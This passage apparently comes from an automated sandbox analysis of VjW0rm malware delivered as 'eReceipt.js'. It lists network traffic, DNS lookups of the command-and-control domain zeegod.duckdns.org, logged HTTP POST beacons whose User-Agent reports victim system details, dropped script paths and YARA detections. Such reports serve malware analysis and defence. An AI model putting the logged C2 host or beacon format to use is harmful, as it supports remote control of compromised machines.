              May 17, 2022 23:11:26.259299994 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:11:26.341944933 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:11:28.129105091 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:11:28.132658005 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:11:36.348809958 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:11:36.430577993 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:11:48.352952003 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:11:48.353236914 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:11:54.365323067 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:11:54.366276979 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:11:55.543098927 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:11:55.621088982 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:12:01.507791042 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:12:01.589854002 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:12:06.481405973 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:12:06.483068943 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:12:13.751390934 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:12:13.822479010 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:12:22.682931900 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:12:22.683082104 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:12:28.685765028 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:12:28.685937881 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:12:29.735692978 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:12:29.822577953 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:12:35.833604097 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:12:35.916405916 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:12:44.730590105 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:12:44.730700970 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:12:51.777445078 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:12:51.859761953 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:13:01.732886076 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:13:01.732992887 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:13:07.731319904 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:13:07.731525898 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:13:08.959758043 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:13:09.039356947 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:13:15.273410082 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:13:15.367495060 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:13:23.759994030 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:13:23.760073900 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:13:30.858787060 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:13:30.945986032 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:13:37.797523975 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:13:37.797700882 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:13:45.824728012 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:13:45.824800968 CEST497729003192.168.2.7212.193.30.129

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 17, 2022 23:09:43.419167995 CEST6355753192.168.2.78.8.8.8
              May 17, 2022 23:09:43.527143002 CEST53635578.8.8.8192.168.2.7
              May 17, 2022 23:09:59.995547056 CEST6099653192.168.2.78.8.8.8
              May 17, 2022 23:10:00.105016947 CEST53609968.8.8.8192.168.2.7
              May 17, 2022 23:10:18.895708084 CEST6461853192.168.2.78.8.8.8
              May 17, 2022 23:10:19.005278111 CEST53646188.8.8.8192.168.2.7
              May 17, 2022 23:10:34.730025053 CEST5884653192.168.2.78.8.8.8
              May 17, 2022 23:10:34.836256981 CEST53588468.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 17, 2022 23:09:43.419167995 CEST192.168.2.78.8.8.80x4f54Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
              May 17, 2022 23:09:59.995547056 CEST192.168.2.78.8.8.80x880Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
              May 17, 2022 23:10:18.895708084 CEST192.168.2.78.8.8.80xe6c2Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)
              May 17, 2022 23:10:34.730025053 CEST192.168.2.78.8.8.80x67f1Standard query (0)zeegod.duckdns.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 17, 2022 23:09:43.527143002 CEST8.8.8.8192.168.2.70x4f54No error (0)zeegod.duckdns.org212.193.30.129A (IP address)IN (0x0001)
              May 17, 2022 23:10:00.105016947 CEST8.8.8.8192.168.2.70x880No error (0)zeegod.duckdns.org212.193.30.129A (IP address)IN (0x0001)
              May 17, 2022 23:10:19.005278111 CEST8.8.8.8192.168.2.70xe6c2No error (0)zeegod.duckdns.org212.193.30.129A (IP address)IN (0x0001)
              May 17, 2022 23:10:34.836256981 CEST8.8.8.8192.168.2.70x67f1No error (0)zeegod.duckdns.org212.193.30.129A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • zeegod.duckdns.org:9003

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.749762212.193.30.1299003C:\Windows\System32\wscript.exe
              TimestampkBytes transferredDirectionData
              May 17, 2022 23:09:43.600795984 CEST679OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:09:58.479193926 CEST1139INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:09:57 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:05.678009987 CEST1140OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:26.567811966 CEST1271INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:26 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:33.772325993 CEST1331OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.749772212.193.30.1299003C:\Windows\System32\wscript.exe
              TimestampkBytes transferredDirectionData
              May 17, 2022 23:10:00.158965111 CEST1140OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:20.556592941 CEST1257INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:20 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:27.670526028 CEST1272OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:46.696969986 CEST10133INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:46 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:53.851820946 CEST12088OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:19.060060024 CEST12549INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:18 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:26.259299994 CEST13145OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:54.365323067 CEST13456INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:54 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:01.507791042 CEST13507OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:28.685765028 CEST13522INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:28 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:35.833604097 CEST13522OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:07.731319904 CEST13524INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:07 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:15.273410082 CEST13531OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:45.824728012 CEST13539INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:45 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.749781212.193.30.1299003C:\Windows\System32\wscript.exe
              TimestampkBytes transferredDirectionData
              May 17, 2022 23:10:19.069473982 CEST1257OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:40.598555088 CEST1332INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:40 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:47.762075901 CEST10134OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:12.984889984 CEST12138INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:12 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:20.157052994 CEST12677OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:48.352952003 CEST13455INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:47 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:55.543098927 CEST13462OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:22.682931900 CEST13521INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:22 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:29.735692978 CEST13522OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:01.732886076 CEST13523INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:01 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:08.959758043 CEST13524OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:37.797523975 CEST13539INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:37 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.749788212.193.30.1299003C:\Windows\System32\wscript.exe
              TimestampkBytes transferredDirectionData
              May 17, 2022 23:10:34.885314941 CEST1332OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:54.761493921 CEST12088INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:54 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:01.956106901 CEST12089OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:11:28.129105091 CEST13186INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:11:28 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:11:36.348809958 CEST13442OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:06.481405973 CEST13508INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:06 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:13.751390934 CEST13508OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:12:44.730590105 CEST13523INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:12:44 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:12:51.777445078 CEST13523OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:13:23.759994030 CEST13538INHTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:13:23 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:13:30.858787060 CEST13538OUTPOST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:23:09:37
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.881056008.000001C6DADBA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000003.353378984.000001C6DCC2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000000.00000002.880778085.000001C6DAD96000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              General

              Target ID:1
              Start time:23:09:40
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:5
              Start time:23:09:51
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.882946701.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.815386378.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.881460459.000001B39E783000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.390360933.000001B3A054F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000002.881618761.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000005.00000003.815331689.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              General

              Target ID:6
              Start time:23:09:57
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:7
              Start time:23:10:00
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:9
              Start time:23:10:09
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.880465658.0000011D6BAE4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000009.00000002.881676533.0000011D6D82C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:high

              General

              Target ID:10
              Start time:23:10:15
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
